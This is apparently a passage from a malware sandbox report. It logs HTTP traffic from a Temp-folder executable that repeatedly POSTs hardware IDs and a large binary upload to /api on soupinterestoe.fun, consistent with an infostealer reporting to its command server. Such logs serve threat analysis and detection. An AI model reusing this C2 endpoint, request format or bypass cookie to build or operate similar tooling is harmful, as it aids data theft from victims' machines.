Dec 27, 2023 18:13:33.308568001 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:13:33.699835062 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=j3a1vasq5he3d6olsh9t8h8rfg; expires=Sun, 21-Apr-2024 11:00:12 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:33 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:33 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:33 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lH2NWttQl8DNyfhcf6jY4kcfOIZ3gwm%2FTfh%2BT8IL7u%2BrV9hfufLwkA42UuPkZUcDbfP2oBxsHDnD5EGpnW9ubnX7SDHJP6oO%2BGpFaaky5jX5%2FyIRBtpFLnnfIfpaL%2BXwP4amVLo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c33 Data Raw: Data Ascii:
Dec 27, 2023 18:13:33.699848890 CET	45	IN	Data Raw: 64 66 39 38 32 33 36 63 37 34 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: df98236c74-DFW15Malformed packet data
Dec 27, 2023 18:13:33.699883938 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49831	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:34.675735950 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:13:34.675915003 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:13:35.057140112 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=63p55u38m46n7gf67rfmlcl1ie; expires=Sun, 21-Apr-2024 11:00:13 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:34 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:34 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:34 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nQovHeY2ZXfAxDMyqKChv5XPu9KoFGWxGQmVNBe%2FevRB4UXtOpWS1Pu%2FFi73rkMt8YnZ14LN2bQ6fUfDiWNijt4oQSzYlsBEMYepHVkQYXE%2F1v82ABBDw33ge10QnEmGZ0vJzFc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c331e81d4 Data Raw: Data Ascii:
Dec 27, 2023 18:13:35.057152033 CET	39	IN	Data Raw: 36 63 33 37 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 6c37-DFW15Malformed packet data
Dec 27, 2023 18:13:35.057163000 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49832	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:35.761778116 CET	367	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20433 Host: soupinterestoe.fun
Dec 27, 2023 18:13:35.761997938 CET	11574	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:13:35.883130074 CET	3858	OUT	Data Raw: a9 1d df 7f 5a eb bb ee 3a 6f 67 0e f5 3b d8 cd 95 36 76 1a 97 98 ec ba a2 17 06 db f3 9c db d8 7f 9f d5 cd f5 eb 7a cb a5 5d 5d d6 e7 b3 d1 23 53 af ee 5a 43 6a dd 72 d6 12 07 fb f5 b5 56 78 63 47 ed 23 6b 65 8d 16 33 d9 91 03 51 5f 89 8d 7d cd Data Ascii: Z:og;6vz]]#SZCjrVxcG#ke3Q_}GD6euZvcO">3'G6gu:'Gi~f~4?Tvd}K~;j4Y{<vo}j+RXz/v-Kt.MB]-tZ+
Dec 27, 2023 18:13:35.883388042 CET	5001	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 80 eb da 70 1c 2c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 5d 1b 8a 83 a5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: p,p]kqum(SZiTf
Dec 27, 2023 18:13:36.505117893 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=92ji8eqeaduhdolldq227d232e; expires=Sun, 21-Apr-2024 11:00:15 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:36 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:36 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:36 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VwwLza3uE5DOvzvxmVW9zdirvd8RtEnl1M18ueRZDIjN0rNBcMkdihfHnYrtzLr%2Bs3Fu%2BaadJlFVHQD0N%2FKRGfuS1KORhbFy83qdkIspF9A8ojhYV%2BUsoyVtdx08WhczA%2FSDB%2B4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c33 Data Raw: Data Ascii:
Dec 27, 2023 18:13:36.505131006 CET	38	IN	Data Raw: 65 65 65 62 31 38 34 36 35 39 2d 44 46 57 0d 0a 0d 0a 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: eeeb184659-DFWfok 212.102.41.2
Dec 27, 2023 18:13:36.505141973 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49834	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:44.214154005 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:13:44.214426994 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:13:44.616981030 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=ffdqe3dtbhuto75o0ld7kgkhfb; expires=Sun, 21-Apr-2024 11:00:23 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:44 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:44 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:44 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bn3elFS9ZeXx6wEJiOyBxxluBDDznqC0EoPs%2Bmk0AzvLDPtJNWgvuggKwUGgeHYKZyNTpvBe9WN%2B7lTaZcIRQoKnSR%2BwHabSi0Pkn8VgBRrwJohCorq6KHuV%2Bq8IgaL%2FG32zR5w%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c3322 Data Raw: Data Ascii:
Dec 27, 2023 18:13:44.616993904 CET	43	IN	Data Raw: 62 64 61 33 65 37 61 61 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: bda3e7aa-DFW15Malformed packet data
Dec 27, 2023 18:13:44.617005110 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	49835	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:44.989089012 CET	366	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 7204 Host: soupinterestoe.fun
Dec 27, 2023 18:13:44.989320993 CET	7204	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:13:45.384376049 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=tdov2mv061b64srei5cdspjf65; expires=Sun, 21-Apr-2024 11:00:24 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:45 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:45 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:45 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AJf%2Fir0OVQUIwkDecb7qZ5Z85v2GxoxgErgpyInYTAVW9DT2P2AOy3L1UqJ1M7y1I6ErndU0iEAmHET5q%2BW3vla0Y84Vm0f3dBoa77dkAc1di2kFEoIEYt2hxdhK%2BrTX0jUZ30Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c332289e8 Data Raw: Data Ascii:
Dec 27, 2023 18:13:45.384392977 CET	32	IN	Data Raw: 34 37 39 36 2d 44 46 57 0d 0a 0d 0a 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: 4796-DFWfok 212.102.41.2
Dec 27, 2023 18:13:45.384403944 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49836	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:45.568279982 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:13:45.568474054 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:13:45.959295034 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=hpm41ui74d9iobp0bft06trg26; expires=Sun, 21-Apr-2024 11:00:24 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:45 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:45 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:45 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sqY2svT%2BlJxMKE8n7RKMdQUSyri3VV9nfaeTv6C4G8hHF1tdcXF3OhfRjo3jPOTIRazhjhwPi3xvHDlKLNXMaBzKPOlQRY0ladWa%2FRpnus6mw9%2BzttRdGpVhPnSWCXXcQBrexcc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c3322c3ed Data Raw: Data Ascii:
Dec 27, 2023 18:13:45.959309101 CET	39	IN	Data Raw: 36 62 61 39 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 6ba9-DFW15Malformed packet data
Dec 27, 2023 18:13:45.959322929 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	49837	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:46.177428961 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:13:46.177675962 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:13:46.566873074 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=aftftm0mcqvatgnbpli0qdbq8g; expires=Sun, 21-Apr-2024 11:00:25 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:46 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:46 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:46 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DrZyB0miA3W1pqPvJDv9OiaU9qVfxcqgR87SdcAmYrMYFA64GM7wtKrtm3J5JqdqmQIQLjlWq%2BCmnF3tgEdviJFdOjMNORZY9qz2ZBWM9fBVXqoVyjUDRyL3MOovDCGaF0%2FY11U%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c3323008512 Data Raw: Data Ascii:
Dec 27, 2023 18:13:46.566890955 CET	37	IN	Data Raw: 36 36 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 66-DFW15Malformed packet data
Dec 27, 2023 18:13:46.566901922 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	49838	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:46.789585114 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:13:46.789762974 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:13:47.326005936 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=8dm02v9fpho8e0ngsvraca8pp7; expires=Sun, 21-Apr-2024 11:00:26 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:47 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:47 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:47 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iRZZ7heX6N60K8Lty2bbjrWfjBynEjJwxnO6vYAa8O5EDnT9dBxvmb33CL2UPXSaMyAax8TmcNaS7UA0cRZfcfbIOYtmc5BWEAgnWuaNSwk7kQh8RcCwy4Y5I5dA0b2Ul3pw8Ao%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c33233d863143e- Data Raw: Data Ascii:
Dec 27, 2023 18:13:47.326020956 CET	33	IN	Data Raw: 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: FW15Malformed packet data
Dec 27, 2023 18:13:47.326033115 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	49839	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:47.636042118 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:13:47.636272907 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
